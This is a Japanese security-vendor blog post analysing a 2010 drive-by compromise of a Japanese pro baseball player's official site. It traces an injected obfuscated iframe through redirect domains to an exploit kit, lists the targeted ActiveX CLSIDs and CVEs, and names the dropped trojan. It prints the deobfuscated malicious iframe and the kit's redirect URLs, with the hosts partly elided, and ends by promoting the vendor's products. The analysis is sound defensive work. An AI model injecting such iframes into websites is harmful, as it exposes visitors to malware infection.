「日本人プロ野球選手のオフィシャルサイト」改ざん事例に対する分析

 2010年4月23日 夕刻頃(日本時間)より、正規Webサイトを改ざんし、不正なプログラムが自動でダウンロードされるようにする「Webからの攻撃」に分類される脅威が相次いで確認されています。今回は、その中から一例をとりあげ、現在の脅威動向について分析してみます。

 我々の不正サイトクローリングシステムによれば、4月23日に「gr<省略>ad.com」が「This URL is currently listed as malicious.」(不正サイト)として評価が行われていることを確認しています。

図1 「Trend Micro Web Reputation Query」による調査結果
図1 「Trend Micro Web Reputation Query」による調査結果

 各国のリサーチエンジニアは、不正サイトクローリングシステムにより自動評価された情報と独自の分析結果を総合的に判断し、担当国における影響を調査しています。

 今回、私は不正サイト「gr<省略>ad.com」へ自動転送する改ざん被害を受けているサイトの一つとして、ある「日本人プロ野球選手のオフィシャルサイト」を特定しています。

図2 被害サイトは「Google Safe Browsing」から「このサイトはコンピュータに損害を与える可能性があります。」と評価されている。
図2 被害サイトは「Google Safe Browsing」から「このサイトはコンピュータに損害を与える可能性があります。」と評価されている。

 改ざん被害と聞くと多くの人は昨年より被害が続く「ガンブラー攻撃」を思い浮かべるのではないでしょうか。当ブログ(該当記事:2010/02/10 マルウェア解析の現場から-03 Gumblar攻撃)や弊社サイト(該当記事:猛威を振るうGumblar(ガンブラー)の脅威とその対策)においてもこれまで何回かその被害を取り上げ、被害実態と対策について紹介してきました。今回新たに確認された被害は従来と同一の攻撃によるものと言えるのでしょうか。被害サイトに対して外部から探りを入れてみたいと思います。

 手始めに被害サイトのドメイン名を元に「Whois検索」をかけてみたいと思います。サイトの信頼性を判断する材料として「Created: (ドメイン登録日)」/「Updated: (ドメイン更新日)」は注目すべき値です。当該サイトは「Created: 2002-02-19」/「Updated: 2009-10-08」。歴史あるサイトに対しては一定の高評価ができます。

 続いて注目したのは、「ICANN Registrar: (レジストラ)」情報。当該サイトは「NETWORK SOLUTIONS, LLC.」。この名前を聞いて「ピンときた」方はかなりの情報通でしょう。4月11日に同登録業者のホスティングサービスを利用していたブログに対して大規模改ざん攻撃が発生していたことが確認されています(該当記事:2010/04/11 WordPress Blogs Suffer from a Mass Compromise)。なんだか怪しい雲行きになってきました。解析を続けましょう。

 視点を変えて、被害サイトのヘッダ(HTMLソースコード)に注目しています。そこには、次の記録が確認できます。

!– Fireworks 4.0 Dreamweaver 4.0 target. Created Wed Feb 17 12:02:20 GMT-0800
図3 被害サイトのヘッダ部分に記載されていたコード

 順当に考えれば、ホームページ作成ソフトにより、2月17日に更新されたページであると推定できます。また、改ざん被害は更新日以降に行われた可能性が高いとも推定できます。もちろん、正確な特定はサイト管理者のもつ複数のログを照らし併せて特定する必要があることは言うまでもありません。

 更に解析を続けましょう。</head>タグ以下、<body>タグ中に難読化されたスクリプトが確認できます。攻撃者の意図を知ることのできる最も重要な手がかりといえます。

図4 被害サイトのHTMLソースコード(抜粋)
図4 被害サイトのHTMLソースコード(抜粋)

 難読化を解除してみたいと思います。

<iframe> frameborder=”0″ onload=’ if (!this.src){ this.src=”http://gr<省略>ad.com/in.cgi?2“; this.height=0; this.width=0;} ‘></iframe>
図5 被害サイトの難読化されたコードを可読化(抜粋)

 赤文字箇所に注目してください。IFRAMタグを使って「gr<省略>ad.com/in.cgi?2」へ転送していることが読み取れます。この転送先は攻撃者にとってのゴールでしょうか。

図6 転送サイトの難読化されたコードを可読化(抜粋)
図6 転送サイトの難読化されたコードを可読化(抜粋)

 やはりそこには、難読化が施されたJavaScriptが潜んでいました。「gr<省略>ad.com」から更に転送された「gi<省略>st.com/grep」。どうやらここが悪の巣窟のようです。

 IFRAMEタグで指定された「gi<省略>st.com」についてもう少し詳しく見てみましょう。IPアドレス情報から位置情報に変換したところ、「Turkey:トルコ共和国」に位置するサーバに転送されていることが特定できます。

 「gi<省略>st.com/grep/error.js.php」に仕掛けられたスクリプトは「Adobe Reader/Adobe Acrobat」の抱える脆弱性を突いてきました。PDFの機能を使って転送を仕掛けるための攻撃です。同時にブラウザ環境情報を送信します。更なる攻撃へのシナリオ作りと行ったところでしょうか。

 環境情報を送信させている場合、アクセス方法によって異なる結果がもたらされることを意味していると考えて間違いないようです。今回、可読化したスクリプトにヒントを得て、「gi<省略>st.com/grep/?spl=2&br=MSIE&vers=7.0&s=」のパラメータ送信を試みてみました。

 パラメータを受け取ったサーバの返答は「gi<省略>st.com/grep/load.php?spl=ActiveX_pack」への転送。ソースコード記載の「clsid」を読み解いて行くことで、攻撃者が狙っている脆弱性をあぶりだします。

図7 転送サイト「gi<省略>st.com/grep/load.php?spl=ActiveX_pack」のコード(抜粋)
図7 転送サイト「gi<省略>st.com/grep/load.php?spl=ActiveX_pack」のコード(抜粋)

 図7は、「gi<省略>st.com/grep/?spl=2&br=MSIE&vers=7.0&s=」パラメータを与えた場合の振る舞いです。異なるパラメータ(他のブラウザ環境)である場合、別の脆弱性(例:「grep/load.php?spl=javas」、「/grep/load.php?spl=mdac」、「/grep/load.php?spl=Opera_telnet」、「/grep/load.php?spl=MS09-002」、「/grep/load.php?spl=pdf_2030」)に誘導されることも明らかと成っています。ここですべてを言及することは困難ですが、対策側である我々は、攻撃者がその状況に応じて最適な(攻撃成功確率の高い)脆弱性を狙っていると考えることが重要といえそうです。

CLSID

アプリケーション名

CVE番号

脆弱性フィルタ番号

CA8A9780-280D-11CF-A24D-444553540000

Adobe Reader/Adobe Acrobat

CVE-2008-2992; CVE-2009-0927

1003026/1003009; 1003405/1003478

97AF4A45-49BE-4485-9F55-91AB40F288F2

Office OCX Word Viewer OCX ActiveX

調査中

N/A

97AF4A45-49BE-4485-9F55-91AB40F22B92

PowerPoint Viewer OCX ActiveX

調査中

N/A

97AF4A45-49BE-4485-9F55-91AB40F22B92

PowerPoint Viewer OCX ActiveX

調査中

N/A

97AF4A45-49BE-4485-9F55-91AB40F22BF2

Word Viewer OCX ActiveX

調査中

N/A

18A295DA-088E-42D1-BE31-5028D7F9B965

Excel Viewer OCX ActiveX

調査中

N/A

3356DB7C-58A7-11D4-AA5C-006097314BF8

Symantec AppStream Client LaunchObj ActiveX(launcher.dll)

CVE-2008-4388

1003235

7F9B30F1-5129-4F5C-A76C-CE264A6C7D10

Hummingbird Deployment Wizard 2008(DeployRun.dll)

CVE-2008-4728

N/A

2BCEAECE-6121-4E78-816C-8CD3121361B0

Peachtree Accounting ActiveX(PAWWeb11.ocx)

CVE-2008-4699

N/A

C1B7E532-3ECB-4E9E-BB3A-2951FFE67C61

C6 Messenger Installation Url Downloader ActiveX

CVE-2008-2551

N/A

 主要なアプリケーションの脆弱性については、「脆弱性フィルタ」による「仮想パッチ」の対策効果が期待できることを確認しました。「脆弱性フィルタ」とは、「ウイルスバスター コーポレートエディション」のプラグイン製品である、「侵入防御ファイアウォール」(Intrusion Defense Firewall)や、「Trend Micro Deep Security」にて提供されている機能です。

 「脆弱性フィルタ」による「仮想パッチ」は、公開されている脆弱性を標的にした攻撃をブロックします。攻撃手法の公開からパッチ適用までの間に発生するセキュリティ上の空白時間に対する対策を提供し、正式にリリースされたパッチを検証・適用後に改めて適用をはずすという柔軟な運用が可能になります。

 脆弱性を抱えている場合、何が起こりうるのか。攻撃者の狙いであるウイルス(実行ファイル)のダウンロードにつながります。今回確認されたのは「TROJ_SASFIS.AJ」(gi<省略>st.com/grep/load/load.exe)でした。これまでの攻撃者の戦略を考えれば、いずれ「TROJ_SASFIS.AJ」は新種に置き換えられるものと推測します。我々は彼らの動向を引き続き監視する必要がありそうです。

 今回の攻撃を何と呼ぶのか。どこまでの範囲をどの名称で呼ぶのかという判断となるため、ここでの言及は避けたいと思います。しかしながら、「gi<省略>st.com/grep/」をクローリングすると攻撃者のしっぽが見えてきます。「CaaS:Crimeware as a Service」、「MaaS:Malware as a Service」とも呼ばれるツール「El<省略>re Exploits pack version 1.3.2」の管理画面です。一連の攻撃はこのコンソールから指示が出され企てられた攻撃であると推定されます。

図8 CaaS、MaaSとも呼ばれる「El<省略>re Exploits pack version 1.3.2」
図8 CaaS、MaaSとも呼ばれる「El<省略>re Exploits pack version 1.3.2」

 最後に、トレンドマイクロのクラウド型セキュリティ基盤「Smart Protection Network」や「脆弱性フィルタ」が今回の攻撃においても有効であることを紹介しておきます。